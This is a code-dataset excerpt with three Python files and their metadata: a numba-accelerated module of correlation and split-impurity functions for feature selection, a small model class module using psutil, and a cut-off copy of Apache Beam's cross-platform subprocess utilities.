"""Largest canonical correlation
Parameters
----------
X : 2d array-like
Array of n elements
Y : 2d array-like
Array of n elements
Returns
-------
cor : float
Largest canonical correlation between X and Y
"""
# Columns for X and Y
Xp = X.shape[1]
Yp = Y.shape[1]
# Center X and Y and then QR decomposition
X = X-X.mean(axis=0)
Y = Y-Y.mean(axis=0)
Qx, Rx = np.linalg.qr(X)
Qy, Ry = np.linalg.qr(Y)
# Check rank for X
rankX = np.linalg.matrix_rank(Rx)
if rankX == 0:
return [0.0]
elif rankX < Xp:
Qx = Qx[:, 0:rankX]
Rx = Rx[0:rankX, 0:rankX]
# Check rank for Y
rankY = np.linalg.matrix_rank(Ry)
if rankY == 0:
return [0.0]
elif rankY < Yp:
Qy = Qy[:, 0:rankY]
Ry = Ry[0:rankY, 0:rankY]
# SVD then clip top eigenvalue
QxQy = np.dot(Qx.T, Qy)
_, cor, _ = np.linalg.svd(QxQy)
return np.clip(cor[0], 0, 1)
def rdc(X, Y, k=10, s=1.0/6.0, f=np.sin):
"""Randomized dependence coefficient
Parameters
----------
X : 2d array-like
Array of n elements
Y : 2d array-like
Array of n elements
k : int
Number of random projections
s : float
Variance of Gaussian random variables
f : function
Non-linear function
Returns
-------
cor : float
Randomized dependence coefficient between X and Y
"""
if X.ndim < 2: X = X.reshape(-1, 1)
if Y.ndim < 2: Y = Y.reshape(-1, 1)
# Shape of random vectors
Xn, Xp = X.shape
Yn, Yp = Y.shape
# X data
X_ones = np.ones((Xn, 1))
X_ = np.array([rank(X[:, j])/float(Xn) for j in range(Xp)]).reshape(Xn, Xp)
X_ = (s/X_.shape[1])*np.column_stack([X_, X_ones])
X_ = X_.dot(np.random.randn(X_.shape[1], k))
# Y data
Y_ones = np.ones((Yn, 1))
Y_ = np.array([rank(Y[:, j])/float(Yn) for j in range(Yp)]).reshape(Yn, Yp)
Y_ = (s/Y_.shape[1])*np.column_stack([Y_, Y_ones])
Y_ = Y_.dot(np.random.randn(Y_.shape[1], k))
# Apply canonical correlation
X_ = np.column_stack([f(X_), X_ones])
Y_ = np.column_stack([f(Y_), Y_ones])
return cca(X_, Y_)
@njit(cache=True, nogil=True, fastmath=True)
def cca_fast(X, Y):
"""Largest canonical correlation
Parameters
----------
X : 2d array-like
Array of n elements
Y : 2d array-like
Array of n elements
Returns
-------
cor : float
Largest correlation between X and Y
"""
# Columns for X and Y
Xp = X.shape[1]
Yp = Y.shape[1]
# Center X and Y and then QR decomposition
mu_x = np.array([np.mean(X[:, j]) for j in range(Xp)])
mu_y = np.array([np.mean(Y[:, j]) for j in range(Yp)])
X = X-mu_x
Y = Y-mu_y
Qx, Rx = np.linalg.qr(X)
Qy, Ry = np.linalg.qr(Y)
# Check rank for X
rankX = np.linalg.matrix_rank(Rx)
if rankX == 0:
return np.array([0.0])
elif rankX < Xp:
Qx = Qx[:, 0:rankX]
Rx = Rx[0:rankX, 0:rankX]
# Check rank for Y
rankY = np.linalg.matrix_rank(Ry)
if rankY == 0:
return np.array([0.0])
elif rankY < Yp:
Qy = Qy[:, 0:rankY]
Ry = Ry[0:rankY, 0:rankY]
# SVD then clip top eigenvalue
QxQy = np.dot(Qx.T, Qy)
_, cor, _ = np.linalg.svd(QxQy)
return cor
@njit(cache=True, nogil=True, fastmath=True)
def rdc_fast(x, y, k=10, s=1.0/6.0, f=np.sin):
"""Randomized dependence coefficient
Parameters
----------
x : 1d array-like
Array of n elements
y : 1d array-like
Array of n elements
k : int
Number of random projections
s : float
Variance of Gaussian random variables
f : function
Non-linear function
Returns
-------
cor : float
Randomized dependence coefficient between x and y
"""
# Shape of random vectors
xn = x.shape[0]
yn = y.shape[0]
# X data
x_ones = np.ones((xn, 1))
X_ = np.argsort(x)/float(xn)
X_ = 0.5*s*np.column_stack((X_, x_ones))
X_ = np.dot(X_, np.random.randn(2, k))
# Y data
y_ones = np.ones((yn, 1))
Y_ = np.argsort(y)/float(yn)
Y_ = 0.5*s*np.column_stack((Y_, y_ones))
Y_ = np.dot(Y_, np.random.randn(2, k))
# Apply canonical correlation
X_ = np.column_stack((f(X_), x_ones))
Y_ = np.column_stack((f(Y_), y_ones))
cor = cca_fast(X_, Y_)[0]
if cor < 0.0:
return 0.0
elif cor > 1.0:
return 1.0
else:
return cor
@njit(cache=True, nogil=True, fastmath=True)
def py_wdcor(x, y, weights):
"""Python port of C function for distance correlation
Note: Version is optimized for use with Numba
Parameters
----------
x : 1d array-like
Array of n elements
y : 1d array-like
Array of n elements
weights : 1d array-like
Weight vector that sums to 1
Returns
-------
dcor : float
Distance correlation
"""
# Define initial variables
n = x.shape[0]
s = int(n*(n-1)/2.)
Edx = np.zeros(n)
Edy = np.zeros(n)
DMY = np.zeros(s)
DMX = np.zeros(s)
F = np.zeros(s)
S1 = 0
S2 = 0
S3 = 0
S2a = 0
S2b = 0
S1X = 0
S1Y = 0
S2X = 0
S2Y = 0
S3X = 0
S3Y = 0
k = 0
for i in range(n-1):
for j in range(i+1, n):
# Distance matrices
DMX[k] = np.fabs(x[i]-x[j])
DMY[k] = np.fabs(y[i]-y[j])
F[k] = weights[i]*weights[j]
S1 += DMX[k]*DMY[k]*F[k]
S1X += DMX[k]*DMX[k]*F[k]
S1Y += DMY[k]*DMY[k]*F[k]
Edx[i] += DMX[k]*weights[j]
Edy[j] += DMY[k]*weights[i]
Edx[j] += DMX[k]*weights[i]
Edy[i] += DMY[k]*weights[j]
k += 1
# Means
for i in range(n):
S3 += Edx[i]*Edy[i]*weights[i]
S2a += Edy[i]*weights[i]
S2b += Edx[i]*weights[i]
S3X += Edx[i]*Edx[i]*weights[i]
S3Y += Edy[i]*Edy[i]*weights[i]
# Variance and covariance terms
S1 = 2*S1
S1Y = 2*S1Y
S1X = 2*S1X
S2 = S2a*S2b
S2X = S2b*S2b
S2Y = S2a*S2a
if S1X == 0 or S2X == 0 or S3X == 0 or S1Y == 0 or S2Y == 0 or S3Y == 0:
return 0
else:
return np.sqrt( (S1+S2-2*S3) / np.sqrt( (S1X+S2X-2*S3X)*(S1Y+S2Y-2*S3Y) ))
@njit(cache=True, nogil=True, fastmath=True)
def py_dcor(x, y):
"""Python port of C function for distance correlation
Note: Version is optimized for use with Numba
Parameters
----------
x : 1d array-like
Array of n elements
y : 1d array-like
Array of n elements
Returns
-------
dcor : float
Distance correlation
"""
n = x.shape[0]
s = int(n*(n-1)/2.)
n2 = n*n
n3 = n2*n
n4 = n3*n
Edx = np.zeros(n)
Edy = np.zeros(n)
DMY = np.zeros(s)
DMX = np.zeros(s)
S1 = 0
S2 = 0
S3 = 0
S2a = 0
S2b = 0
S1X = 0
S1Y = 0
S2X = 0
S2Y = 0
S3X = 0
S3Y = 0
k = 0
for i in range(n-1):
for j in range(i+1, n):
# Distance matrices
DMX[k] = np.fabs(x[i]-x[j])
DMY[k] = np.fabs(y[i]-y[j])
S1 += DMX[k]*DMY[k]
S1X += DMX[k]*DMX[k]
S1Y += DMY[k]*DMY[k]
Edx[i] += DMX[k]
Edy[j] += DMY[k]
Edx[j] += DMX[k]
Edy[i] += DMY[k]
k += 1
# Means
for i in range(n):
S3 += Edx[i]*Edy[i]
S2a += Edy[i]
S2b += Edx[i]
S3X += Edx[i]*Edx[i]
S3Y += Edy[i]*Edy[i]
# Variance and covariance terms
S1 = (2*S1)/float(n2)
S1Y = (2*S1Y)/float(n2)
S1X = (2*S1X)/float(n2)
S2 = S2a*S2b/float(n4)
S2X = S2b*S2b/float(n4)
S2Y = S2a*S2a/float(n4)
S3 /= float(n3)
S3X /= float(n3)
S3Y /= float(n3)
if S1X == 0 or S2X == 0 or S3X == 0 or S1Y == 0 or S2Y == 0 or S3Y == 0:
return 0
else:
return np.sqrt( (S1+S2-2*S3) / np.sqrt( (S1X+S2X-2*S3X)*(S1Y+S2Y-2*S3Y) ))
# Lambda function used in approx_wdcor function
MEAN = lambda z: sum(z)/float(len(z))
def approx_wdcor(x, y):
"""Approximate distance correlation by binning arrays
NOTE: Code ported from R function approx.dcor at:
https://rdrr.io/cran/extracat/src/R/wdcor.R
Parameters
----------
x : 1d array-like
Array of n elements
y : 1d array-like
Array of n elements
Returns
-------
dcor : float
Distance correlation
"""
# Equal cuts and then create dataframe
n = x.shape[0]
cx = pd.cut(x, n, include_lowest=True)
cy = pd.cut(y, n, include_lowest=True)
df = pd.DataFrame(
np.column_stack([x, y, cx, cy]), columns=['x', 'y', 'cx', 'cy']
)
# Average values in interval
vx = df['x'].groupby(df['cx'], sort=False).agg(MEAN).values
vy = df['y'].groupby(df['cy'], sort=False).agg(MEAN).values
# Calculate frequencies based on groupings
f = df[['x', 'y']].groupby([df['cx'], df['cy']], sort=False).size()
# Normalize weights and calculate weighted distance correlation
w = f.values/float(f.values.sum())
# Recompute n
n = len(w)
# Call either the Python or C version based on array length
if n > 5000:
return c_wdcor(vx[f.index.labels[0]], vy[f.index.labels[1]], w)
else:
return py_wdcor(vx[f.index.labels[0]], vy[f.index.labels[1]], w)
def c_wdcor(x, y, weights):
"""Wrapper for C version of weighted distance correlation
Parameters
----------
x : 1d array-like
Array of n elements
y : 1d array-like
Array of n elements
weights : 1d array-like
Weight vector that sums to 1
Returns
-------
dcor : float
Distance correlation
"""
n = x.shape[0]
array_type = ctypes.c_double*n
return CFUNC_DCORS_DLL.wdcor(array_type(*x),
array_type(*y),
ctypes.c_int(n),
array_type(*weights))
def c_dcor(x, y):
"""Wrapper for C version of distance correlation
Parameters
----------
x : 1d array-like
Array of n elements
y : 1d array-like
Array of n elements
Returns
-------
dcor : float
Distance correlation
"""
n = x.shape[0]
array_type = ctypes.c_double*n
return CFUNC_DCORS_DLL.dcor(array_type(*x),
array_type(*y),
ctypes.c_int(n))
#################################
"""FEATURE SELECTORS: DISCRETE"""
#################################
@njit(cache=True, nogil=True, fastmath=True)
def mc_fast(x, y, n_classes):
"""Multiple correlation
Parameters
----------
x : 1d array-like
Array of n elements
y : 1d array-like
Array of n elements
n_classes : int
Number of classes
Returns
-------
cor : float
Multiple correlation coefficient between x and y
"""
ssb, mu = 0.0, x.mean()
# Sum of squares total
sst = np.sum((x-mu)*(x-mu))
if sst == 0.0: return 0.0
for j in range(n_classes):
# Grab data for current class and if empty skip
group = x[y==j]
if group.shape[0] == 0: continue
# Sum of squares between
mu_j = group.mean()
n_j = group.shape[0]
ssb += n_j*(mu_j-mu)*(mu_j-mu)
return np.sqrt(ssb/sst)
def mi(x, y):
"""Mutual information
Parameters
----------
x : 1d array-like
Array of n elements
y : 1d array-like
Array of n elements
Returns
-------
info : float
Mutual information between x and y
"""
if x.ndim == 1: x = x.reshape(-1, 1)
return mutual_info_classif(x, y)[0]
###############################
"""SPLIT SELECTORS: DISCRETE"""
###############################
@njit(cache=True, nogil=True, fastmath=True)
def gini_index(y, labels):
"""Gini index for node in tree
Note: Despite being jitted, this function is still slow and a bottleneck
in the actual training phase. Sklearn's Cython version is used to
find the best split and this function is then called on the parent node
and two child nodes to calculate feature importances using the mean
decrease impurity formula
Parameters
----------
y : 1d array-like
Array of labels
labels : 1d array-like
Unique labels
Returns
-------
gini : float
Gini index
"""
# Gini index for each label
n, gini = len(y), 0.0
for label in labels:
# Proportion of each label
p = np.mean(y == label)
# Only square if greater than 0
if p > 0: gini += p*p
# Gini index
return 1 - gini
#################################
"""SPLIT SELECTORS: CONTINUOUS"""
#################################
@njit(cache=True, nogil=True, fastmath=True)
def mse(y):
"""Mean squared error for node in tree
Parameters
----------
y : 1d array-like
Array of labels
Returns
-------
error : float
Mean squared error
"""
mu = y.mean()
return np.mean((y-mu)*(y-mu))
| 23.085044 | 83 | 0.523565 | from __future__ import absolute_import, division, print_function
import ctypes
from numba import njit
import numpy as np
from os.path import dirname, join
import pandas as pd
from scipy.stats import rankdata as rank
from sklearn.feature_selection import mutual_info_classif
# from externals.six.moves import range
#######################
"""CREATE C WRAPPERS"""
#######################
# Define constants for wrapping C functions
# SHARED_OBJECT_DIR = join(dirname(__file__), 'bin')
# Weighted distance correlation
# CFUNC_DCORS_PATH = join(SHARED_OBJECT_DIR, 'dcor.so')
# CFUNC_DCORS_DLL = ctypes.CDLL(CFUNC_DCORS_PATH)
# CFUNC_DCORS_DLL.wdcor.argtypes = (
# ctypes.POINTER(ctypes.c_double), # x
# ctypes.POINTER(ctypes.c_double), # y
# ctypes.c_int, # n
# ctypes.POINTER(ctypes.c_double) # w
# )
# CFUNC_DCORS_DLL.wdcor.restype = ctypes.c_double
# Unweighted distance correlation
# CFUNC_DCORS_DLL.dcor.argtypes = (
# ctypes.POINTER(ctypes.c_double), # x
# ctypes.POINTER(ctypes.c_double), # y
# ctypes.c_int, # n
# )
# CFUNC_DCORS_DLL.dcor.restype = ctypes.c_double
###################################
"""FEATURE SELECTORS: CONTINUOUS"""
###################################
@njit(cache=True, nogil=True, fastmath=True)
def pcor(x, y):
"""Pearson correlation
Parameters
----------
x : 1d array-like
Array of n elements
y : 1d array-like
Array of n elements
Returns
-------
cor : float
Pearson correlation
"""
if x.ndim > 1: x = x.ravel()
if y.ndim > 1: y = y.ravel()
# Define variables for looping
n, sx, sy, sx2, sy2, sxy = len(x), 0.0, 0.0, 0.0, 0.0, 0.0
# Loop to calculate statistics
for i in range(n):
xi = x[i]
yi = y[i]
sx += xi
sx2 += xi*xi
sy += yi
sy2 += yi*yi
sxy += xi*yi
# Covariance terms
cov = n*sxy - sx*sy
ssx = n*sx2 - sx*sx
ssy = n*sy2 - sy*sy
# Catch division by zero errors
if ssx == 0.0 or ssy == 0.0:
return 0.0
else:
return cov/np.sqrt(ssx*ssy)
def cca(X, Y):
"""Largest canonical correlation
Parameters
----------
X : 2d array-like
Array of n elements
Y : 2d array-like
Array of n elements
Returns
-------
cor : float
Largest canonical correlation between X and Y
"""
# Columns for X and Y
Xp = X.shape[1]
Yp = Y.shape[1]
# Center X and Y and then QR decomposition
X = X-X.mean(axis=0)
Y = Y-Y.mean(axis=0)
Qx, Rx = np.linalg.qr(X)
Qy, Ry = np.linalg.qr(Y)
# Check rank for X
rankX = np.linalg.matrix_rank(Rx)
if rankX == 0:
return [0.0]
elif rankX < Xp:
Qx = Qx[:, 0:rankX]
Rx = Rx[0:rankX, 0:rankX]
# Check rank for Y
rankY = np.linalg.matrix_rank(Ry)
if rankY == 0:
return [0.0]
elif rankY < Yp:
Qy = Qy[:, 0:rankY]
Ry = Ry[0:rankY, 0:rankY]
# SVD then clip top eigenvalue
QxQy = np.dot(Qx.T, Qy)
_, cor, _ = np.linalg.svd(QxQy)
return np.clip(cor[0], 0, 1)
def rdc(X, Y, k=10, s=1.0/6.0, f=np.sin):
"""Randomized dependence coefficient
Parameters
----------
X : 2d array-like
Array of n elements
Y : 2d array-like
Array of n elements
k : int
Number of random projections
s : float
Variance of Gaussian random variables
f : function
Non-linear function
Returns
-------
cor : float
Randomized dependence coefficient between X and Y
"""
if X.ndim < 2: X = X.reshape(-1, 1)
if Y.ndim < 2: Y = Y.reshape(-1, 1)
# Shape of random vectors
Xn, Xp = X.shape
Yn, Yp = Y.shape
# X data
X_ones = np.ones((Xn, 1))
X_ = np.array([rank(X[:, j])/float(Xn) for j in range(Xp)]).reshape(Xn, Xp)
X_ = (s/X_.shape[1])*np.column_stack([X_, X_ones])
X_ = X_.dot(np.random.randn(X_.shape[1], k))
# Y data
Y_ones = np.ones((Yn, 1))
Y_ = np.array([rank(Y[:, j])/float(Yn) for j in range(Yp)]).reshape(Yn, Yp)
Y_ = (s/Y_.shape[1])*np.column_stack([Y_, Y_ones])
Y_ = Y_.dot(np.random.randn(Y_.shape[1], k))
# Apply canonical correlation
X_ = np.column_stack([f(X_), X_ones])
Y_ = np.column_stack([f(Y_), Y_ones])
return cca(X_, Y_)
@njit(cache=True, nogil=True, fastmath=True)
def cca_fast(X, Y):
"""Largest canonical correlation
Parameters
----------
X : 2d array-like
Array of n elements
Y : 2d array-like
Array of n elements
Returns
-------
cor : float
Largest correlation between X and Y
"""
# Columns for X and Y
Xp = X.shape[1]
Yp = Y.shape[1]
# Center X and Y and then QR decomposition
mu_x = np.array([np.mean(X[:, j]) for j in range(Xp)])
mu_y = np.array([np.mean(Y[:, j]) for j in range(Yp)])
X = X-mu_x
Y = Y-mu_y
Qx, Rx = np.linalg.qr(X)
Qy, Ry = np.linalg.qr(Y)
# Check rank for X
rankX = np.linalg.matrix_rank(Rx)
if rankX == 0:
return np.array([0.0])
elif rankX < Xp:
Qx = Qx[:, 0:rankX]
Rx = Rx[0:rankX, 0:rankX]
# Check rank for Y
rankY = np.linalg.matrix_rank(Ry)
if rankY == 0:
return np.array([0.0])
elif rankY < Yp:
Qy = Qy[:, 0:rankY]
Ry = Ry[0:rankY, 0:rankY]
# SVD then clip top eigenvalue
QxQy = np.dot(Qx.T, Qy)
_, cor, _ = np.linalg.svd(QxQy)
return cor
@njit(cache=True, nogil=True, fastmath=True)
def rdc_fast(x, y, k=10, s=1.0/6.0, f=np.sin):
"""Randomized dependence coefficient
Parameters
----------
x : 1d array-like
Array of n elements
y : 1d array-like
Array of n elements
k : int
Number of random projections
s : float
Variance of Gaussian random variables
f : function
Non-linear function
Returns
-------
cor : float
Randomized dependence coefficient between x and y
"""
# Shape of random vectors
xn = x.shape[0]
yn = y.shape[0]
# X data
x_ones = np.ones((xn, 1))
X_ = np.argsort(x)/float(xn)
X_ = 0.5*s*np.column_stack((X_, x_ones))
X_ = np.dot(X_, np.random.randn(2, k))
# Y data
y_ones = np.ones((yn, 1))
Y_ = np.argsort(y)/float(yn)
Y_ = 0.5*s*np.column_stack((Y_, y_ones))
Y_ = np.dot(Y_, np.random.randn(2, k))
# Apply canonical correlation
X_ = np.column_stack((f(X_), x_ones))
Y_ = np.column_stack((f(Y_), y_ones))
cor = cca_fast(X_, Y_)[0]
if cor < 0.0:
return 0.0
elif cor > 1.0:
return 1.0
else:
return cor
@njit(cache=True, nogil=True, fastmath=True)
def py_wdcor(x, y, weights):
"""Python port of C function for distance correlation
Note: Version is optimized for use with Numba
Parameters
----------
x : 1d array-like
Array of n elements
y : 1d array-like
Array of n elements
weights : 1d array-like
Weight vector that sums to 1
Returns
-------
dcor : float
Distance correlation
"""
# Define initial variables
n = x.shape[0]
s = int(n*(n-1)/2.)
Edx = np.zeros(n)
Edy = np.zeros(n)
DMY = np.zeros(s)
DMX = np.zeros(s)
F = np.zeros(s)
S1 = 0
S2 = 0
S3 = 0
S2a = 0
S2b = 0
S1X = 0
S1Y = 0
S2X = 0
S2Y = 0
S3X = 0
S3Y = 0
k = 0
for i in range(n-1):
for j in range(i+1, n):
# Distance matrices
DMX[k] = np.fabs(x[i]-x[j])
DMY[k] = np.fabs(y[i]-y[j])
F[k] = weights[i]*weights[j]
S1 += DMX[k]*DMY[k]*F[k]
S1X += DMX[k]*DMX[k]*F[k]
S1Y += DMY[k]*DMY[k]*F[k]
Edx[i] += DMX[k]*weights[j]
Edy[j] += DMY[k]*weights[i]
Edx[j] += DMX[k]*weights[i]
Edy[i] += DMY[k]*weights[j]
k += 1
# Means
for i in range(n):
S3 += Edx[i]*Edy[i]*weights[i]
S2a += Edy[i]*weights[i]
S2b += Edx[i]*weights[i]
S3X += Edx[i]*Edx[i]*weights[i]
S3Y += Edy[i]*Edy[i]*weights[i]
# Variance and covariance terms
S1 = 2*S1
S1Y = 2*S1Y
S1X = 2*S1X
S2 = S2a*S2b
S2X = S2b*S2b
S2Y = S2a*S2a
if S1X == 0 or S2X == 0 or S3X == 0 or S1Y == 0 or S2Y == 0 or S3Y == 0:
return 0
else:
return np.sqrt( (S1+S2-2*S3) / np.sqrt( (S1X+S2X-2*S3X)*(S1Y+S2Y-2*S3Y) ))
@njit(cache=True, nogil=True, fastmath=True)
def py_dcor(x, y):
"""Python port of C function for distance correlation
Note: Version is optimized for use with Numba
Parameters
----------
x : 1d array-like
Array of n elements
y : 1d array-like
Array of n elements
Returns
-------
dcor : float
Distance correlation
"""
n = x.shape[0]
s = int(n*(n-1)/2.)
n2 = n*n
n3 = n2*n
n4 = n3*n
Edx = np.zeros(n)
Edy = np.zeros(n)
DMY = np.zeros(s)
DMX = np.zeros(s)
S1 = 0
S2 = 0
S3 = 0
S2a = 0
S2b = 0
S1X = 0
S1Y = 0
S2X = 0
S2Y = 0
S3X = 0
S3Y = 0
k = 0
for i in range(n-1):
for j in range(i+1, n):
# Distance matrices
DMX[k] = np.fabs(x[i]-x[j])
DMY[k] = np.fabs(y[i]-y[j])
S1 += DMX[k]*DMY[k]
S1X += DMX[k]*DMX[k]
S1Y += DMY[k]*DMY[k]
Edx[i] += DMX[k]
Edy[j] += DMY[k]
Edx[j] += DMX[k]
Edy[i] += DMY[k]
k += 1
# Means
for i in range(n):
S3 += Edx[i]*Edy[i]
S2a += Edy[i]
S2b += Edx[i]
S3X += Edx[i]*Edx[i]
S3Y += Edy[i]*Edy[i]
# Variance and covariance terms
S1 = (2*S1)/float(n2)
S1Y = (2*S1Y)/float(n2)
S1X = (2*S1X)/float(n2)
S2 = S2a*S2b/float(n4)
S2X = S2b*S2b/float(n4)
S2Y = S2a*S2a/float(n4)
S3 /= float(n3)
S3X /= float(n3)
S3Y /= float(n3)
if S1X == 0 or S2X == 0 or S3X == 0 or S1Y == 0 or S2Y == 0 or S3Y == 0:
return 0
else:
return np.sqrt( (S1+S2-2*S3) / np.sqrt( (S1X+S2X-2*S3X)*(S1Y+S2Y-2*S3Y) ))
# Lambda function used in approx_wdcor function
MEAN = lambda z: sum(z)/float(len(z))
def approx_wdcor(x, y):
"""Approximate distance correlation by binning arrays
NOTE: Code ported from R function approx.dcor at:
https://rdrr.io/cran/extracat/src/R/wdcor.R
Parameters
----------
x : 1d array-like
Array of n elements
y : 1d array-like
Array of n elements
Returns
-------
dcor : float
Distance correlation
"""
# Equal cuts and then create dataframe
n = x.shape[0]
cx = pd.cut(x, n, include_lowest=True)
cy = pd.cut(y, n, include_lowest=True)
df = pd.DataFrame(
np.column_stack([x, y, cx, cy]), columns=['x', 'y', 'cx', 'cy']
)
# Average values in interval
vx = df['x'].groupby(df['cx'], sort=False).agg(MEAN).values
vy = df['y'].groupby(df['cy'], sort=False).agg(MEAN).values
# Calculate frequencies based on groupings
f = df[['x', 'y']].groupby([df['cx'], df['cy']], sort=False).size()
# Normalize weights and calculate weighted distance correlation
w = f.values/float(f.values.sum())
# Recompute n
n = len(w)
# Call either the Python or C version based on array length
if n > 5000:
return c_wdcor(vx[f.index.labels[0]], vy[f.index.labels[1]], w)
else:
return py_wdcor(vx[f.index.labels[0]], vy[f.index.labels[1]], w)
def c_wdcor(x, y, weights):
"""Wrapper for C version of weighted distance correlation
Parameters
----------
x : 1d array-like
Array of n elements
y : 1d array-like
Array of n elements
weights : 1d array-like
Weight vector that sums to 1
Returns
-------
dcor : float
Distance correlation
"""
n = x.shape[0]
array_type = ctypes.c_double*n
return CFUNC_DCORS_DLL.wdcor(array_type(*x),
array_type(*y),
ctypes.c_int(n),
array_type(*weights))
def c_dcor(x, y):
"""Wrapper for C version of distance correlation
Parameters
----------
x : 1d array-like
Array of n elements
y : 1d array-like
Array of n elements
Returns
-------
dcor : float
Distance correlation
"""
n = x.shape[0]
array_type = ctypes.c_double*n
return CFUNC_DCORS_DLL.dcor(array_type(*x),
array_type(*y),
ctypes.c_int(n))
#################################
"""FEATURE SELECTORS: DISCRETE"""
#################################
@njit(cache=True, nogil=True, fastmath=True)
def mc_fast(x, y, n_classes):
"""Multiple correlation
Parameters
----------
x : 1d array-like
Array of n elements
y : 1d array-like
Array of n elements
n_classes : int
Number of classes
Returns
-------
cor : float
Multiple correlation coefficient between x and y
"""
ssb, mu = 0.0, x.mean()
# Sum of squares total
sst = np.sum((x-mu)*(x-mu))
if sst == 0.0: return 0.0
for j in range(n_classes):
# Grab data for current class and if empty skip
group = x[y==j]
if group.shape[0] == 0: continue
# Sum of squares between
mu_j = group.mean()
n_j = group.shape[0]
ssb += n_j*(mu_j-mu)*(mu_j-mu)
return np.sqrt(ssb/sst)
def mi(x, y):
"""Mutual information
Parameters
----------
x : 1d array-like
Array of n elements
y : 1d array-like
Array of n elements
Returns
-------
info : float
Mutual information between x and y
"""
if x.ndim == 1: x = x.reshape(-1, 1)
return mutual_info_classif(x, y)[0]
###############################
"""SPLIT SELECTORS: DISCRETE"""
###############################
@njit(cache=True, nogil=True, fastmath=True)
def gini_index(y, labels):
"""Gini index for node in tree
Note: Despite being jitted, this function is still slow and a bottleneck
in the actual training phase. Sklearn's Cython version is used to
find the best split and this function is then called on the parent node
and two child nodes to calculate feature importances using the mean
decrease impurity formula
Parameters
----------
y : 1d array-like
Array of labels
labels : 1d array-like
Unique labels
Returns
-------
gini : float
Gini index
"""
# Gini index for each label
n, gini = len(y), 0.0
for label in labels:
# Proportion of each label
p = np.mean(y == label)
# Only square if greater than 0
if p > 0: gini += p*p
# Gini index
return 1 - gini
#################################
"""SPLIT SELECTORS: CONTINUOUS"""
#################################
@njit(cache=True, nogil=True, fastmath=True)
def mse(y):
"""Mean squared error for node in tree
Parameters
----------
y : 1d array-like
Array of labels
Returns
-------
error : float
Mean squared error
"""
mu = y.mean()
return np.mean((y-mu)*(y-mu))
| 0 | 0 | 0 |
1c67f80426cccc03d5222dfecfea87a636eddca5 | 1,044 | py | Python | models.py | ServerChef/serverchef-system-helpers | fee45b06902d0887767fb430ade31af8052f4ff3 | [
"MIT"
] | null | null | null | models.py | ServerChef/serverchef-system-helpers | fee45b06902d0887767fb430ade31af8052f4ff3 | [
"MIT"
] | null | null | null | models.py | ServerChef/serverchef-system-helpers | fee45b06902d0887767fb430ade31af8052f4ff3 | [
"MIT"
] | null | null | null | import json
import psutil
__all__ = ['SystemdUnitStatus', 'Use']
| 22.695652 | 70 | 0.599617 | import json
import psutil
__all__ = ['SystemdUnitStatus', 'Use']
class BaseModel(object):
def to_dict(self):
return {name: getattr(self, name) for name in self.get_keys()}
def get_keys(self):
return [name for name in dir(self) if
not name.startswith('__')
and not callable(getattr(self, name))]
def __init__(self, **kwargs):
keys = self.get_keys()
for kwarg, value in kwargs.items():
if kwarg in keys:
setattr(self, kwarg, value)
def __repr__(self):
print(json.dumps(self.to_dict()))
class SystemdUnitStatus(BaseModel):
active = True
status = "active"
class UsedPort(BaseModel):
port = 0
program_name = "/dev/null"
pid = 10
protocol = "tcp6"
bind_address = "0.0.0.0"
@classmethod
def from_ps_util_sconn(cls, conn):
ret = cls()
ret.program_name = psutil.Process(conn.pid).name()
ret.bind_address, ret.port = conn.laddr
ret.pid = conn.pid
return ret
| 586 | 214 | 176 |
ab587aac8ba41bf3e5ff1adc3b5bef4b37c4a250 | 3,911 | py | Python | sdks/python/apache_beam/utils/processes.py | eyal0/beam | 9c6922976cc2a5c6a2ef836c1986ff769cda99a5 | [
"Apache-2.0"
] | 3 | 2020-08-28T17:47:26.000Z | 2021-08-17T06:38:58.000Z | sdks/python/apache_beam/utils/processes.py | eyal0/beam | 9c6922976cc2a5c6a2ef836c1986ff769cda99a5 | [
"Apache-2.0"
] | 80 | 2020-01-16T09:55:09.000Z | 2020-10-03T13:43:07.000Z | sdks/python/apache_beam/utils/processes.py | eyal0/beam | 9c6922976cc2a5c6a2ef836c1986ff769cda99a5 | [
"Apache-2.0"
] | 1 | 2020-03-24T08:34:38.000Z | 2020-03-24T08:34:38.000Z | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Cross-platform utilities for creating subprocesses.
For internal use only; no backwards-compatibility guarantees.
"""
# pytype: skip-file
from __future__ import absolute_import
import platform
import subprocess
import traceback
from typing import TYPE_CHECKING
# On Windows, we need to use shell=True when creating subprocesses for binary
# paths to be resolved correctly.
force_shell = platform.system() == 'Windows'
# We mimic the interface of the standard Python subprocess module.
PIPE = subprocess.PIPE
STDOUT = subprocess.STDOUT
CalledProcessError = subprocess.CalledProcessError
if TYPE_CHECKING:
call = subprocess.call
check_call = subprocess.check_call
check_output = subprocess.check_output
Popen = subprocess.Popen
else:
| 35.554545 | 77 | 0.676042 | #
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Cross-platform utilities for creating subprocesses.
For internal use only; no backwards-compatibility guarantees.
"""
# pytype: skip-file
from __future__ import absolute_import
import platform
import subprocess
import traceback
from typing import TYPE_CHECKING
# On Windows, we need to use shell=True when creating subprocesses for binary
# paths to be resolved correctly.
force_shell = platform.system() == 'Windows'
# We mimic the interface of the standard Python subprocess module.
PIPE = subprocess.PIPE
STDOUT = subprocess.STDOUT
CalledProcessError = subprocess.CalledProcessError
if TYPE_CHECKING:
call = subprocess.call
check_call = subprocess.check_call
check_output = subprocess.check_output
Popen = subprocess.Popen
else:
def call(*args, **kwargs):
if force_shell:
kwargs['shell'] = True
try:
out = subprocess.call(*args, **kwargs)
except OSError:
raise RuntimeError("Executable {} not found".format(args[0]))
except subprocess.CalledProcessError as error:
